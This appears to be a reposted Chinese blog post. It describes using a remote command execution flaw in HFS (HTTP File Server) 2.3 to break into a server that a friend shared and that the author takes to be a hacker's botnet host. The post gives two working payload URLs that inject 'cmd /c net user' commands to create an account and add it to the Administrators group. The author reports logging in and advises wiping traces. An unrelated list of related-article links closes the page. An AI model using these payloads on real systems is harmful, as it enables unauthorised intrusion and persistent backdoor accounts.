先来科普一下:

HFS是什么?

hfs网络文件服务器 2.3是专为个人用户所设计的HTTP档案系统,如果您觉得架设FTP Server太麻烦,那么这个软件可以提供您更方便的网络文件传输系统,下载后无须安装,只要解压缩后执行 hfs.exe,于「Virtual File System(虚拟档案系统)」窗格下按鼠标右键,即可新增/移除虚拟档案资料夹,或者直接将欲加入的档案拖曳至此窗口,便可架设完成个人HTTP网络文件服务器。

故事开始了。

今天尼古拉斯四哥在群里发来那么一个IP

打开看了一下。是传说中的抓鸡神器.HFS,如下图所示:

其实HFS有一个命令执行漏洞。

Payload:

http://127.0.0.1/?search==%00{.exec|cmd /c net user DEF DEFHACKER123 /add.}
http://127.0.0.1/?search==%00{.exec|cmd /c net localgroup Administrators DEF /add.}

执行后是这样的效果。

成功登录!

黑客的工具

然后黑客给我发来了一个消息

哈哈,是四哥发的,如果真是管理员早给关了我账户了。礼尚往来的我也给他发了一个。

四哥的恶作剧。

我给后面悄悄加了一句。

本想通过逆向把黑客的马场日穿。然而让四哥逆向弄,弄半天没弄好。改日续集吧。

记得擦屁股否则黑客的DDOS攻击可是很猛烈的。

 结束

转载于:https://www.cnblogs.com/xishaonian/p/6218170.html

HFS远程命令执行漏洞入侵抓鸡黑阔服务器相关推荐

  1. HFS远程命令执行漏洞复现

    漏洞程序下载地址:Http File Server 这里说一下,在Windows server 2003中复现时,我直接使用Administrator用户登录,然后复现,未出现权限问题.再Window ...

  2. NSA泄密事件之SMB系列远程命令执行漏洞及Doublepulsar后门全球数据分析

    本文讲的是NSA泄密事件之SMB系列远程命令执行漏洞及Doublepulsar后门全球数据分析, 1.   概述 2017 年 4 月 14 日,黑客组织Shadow Brokers 公布了一批新的N ...

  3. FastJson远程命令执行漏洞

    FastJson远程命令执行漏洞学习笔记 Fastjson简介 fastjson用于将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean.fastjson.ja ...

  4. 远程命令执行漏洞与远程代码执行漏洞33333

    远程命令执行漏洞的概念 远程命令执行漏洞,指用户通过浏览器提交执行操作命令, 由于服务器端,没有针对执行函数做过滤,就执行了恶意命令 远程代码执行漏洞概念 代码执行漏洞也叫代码注入漏洞,指用户通过浏览 ...

  5. DIR-645远程命令执行漏洞

    首先我们分析网上公开的exp确定漏洞相关组件及payload,之后通过IDA分析研究漏洞是如何触发的,最后在attifyos中进行模拟,验证漏洞. 本次实验的漏洞是某品牌路由器service.cgi远 ...

  6. CVE-2019-19781 Citrix ADCNetScaler远程命令执行漏洞

    未经允许,不得擅自转载,违者必究 一.前言 @Adminxe 因为最近在刷edusrc,由此发现这个漏洞,涉及多所高校,所以过来给大家实战POC测试一波,可直接进行命令执行,Citrix产品中的漏洞使 ...

  7. Fastjson远程命令执行漏洞总结

    1.FastJson 简介 fastjson.jar包原始下载地址:https://github.com/alibaba/fastjson fastjson用于将Java Bean序列化为JSON字符 ...

  8. webmin远程命令执行漏洞(cve-2019-15107)深入分析

    漏洞描述 近日Webmin被发现存在一处远程命令执行漏洞,经过分析后,初步猜测其为一次后门植入事件. Webmin是目前功能最强大的基于Web的Unix系统管理工具.管理员通过浏览器访问Webmin的 ...

  9. 【注意】关于Redis存在远程命令执行漏洞的安全公告

    点击蓝色"程序猿DD"关注我 回复"资源"获取独家整理的学习资料! 来源:CNVD漏洞平台 安全公告编号:CNTA-2019-0024 2019年7月10日,国 ...

  10. rmi远程反序列化rce漏洞_Oracle WebLogic 反序列化远程命令执行漏洞预警

    报告编号:B6-2019-041901 报告来源:360-CERT 报告作者:360-CERT 更新日期:2019-04-19 0x00 事件背景 2019年4月17日,国家信息安全漏洞共享平台(CN ...

最新文章

  1. Fragment-FragmentMannager中的方法
  2. CTFshow 文件上传 web154
  3. Jquery 获取select,radio 和 checkbox的值
  4. 【深度学习】循环神经网络(RNN)简易教程
  5. springboot整合shiro地址栏JSESSIONID问题
  6. 云原生安全厂商小佑科技完成数千万Pre-A轮融资
  7. Spring Boot 2.3.3 正式发布!
  8. shopxo 二次开发:设置(后台登录页)背景图
  9. 好用到让设计师尖叫的UI设计网格素材
  10. springmvc如何使用视图解析器_SpringMVC相关面试题
  11. 网吧破解还原卡的方法总结!!
  12. 斜杠(右斜杠)【/】 与 反斜杠(右斜杠)【\】
  13. 滴滴快车奖励政策,高峰奖励,翻倍奖励,按成交率,指派单数分级(9月7日~9月13日)...
  14. Linux里get命令,Linux apt-get 命令用法详解-Linux命令大全(手册)
  15. 计算机考研要考java吗_计算机二级考JAVA还是C?
  16. 蓝桥杯--封印之门( Floyd算法)
  17. 2018 WAIC大咖云集,七牛云“视觉智能,瞳鉴未来”论坛开启在即
  18. 我一结婚到婆家,婆家全家人就自动不做饭了,啥都等我做
  19. Google 面试题:分饼干
  20. host速度 mtk usb_mtk-usb代码分析之usb gadget

热门文章

  1. 前端安全之常见漏洞及防御
  2. hive+hbase学习手册
  3. 01-【Cron定时表达式】在线Cron表达式生成器+Cron表达式详解
  4. 召唤神龙Ladon强化Cobalt Strike
  5. python姿态识别_基于深度学习的人体姿态识别算法总结
  6. textView属性
  7. 魅族 刷机android 6.0,魅族mx6 flyme6
  8. Cox比例风险回归模型单因素多因素生存分析
  9. 临时邮件、临时接收手机验证码等好用工具
  10. unity xlua 在vs2019下断点调试(babelua)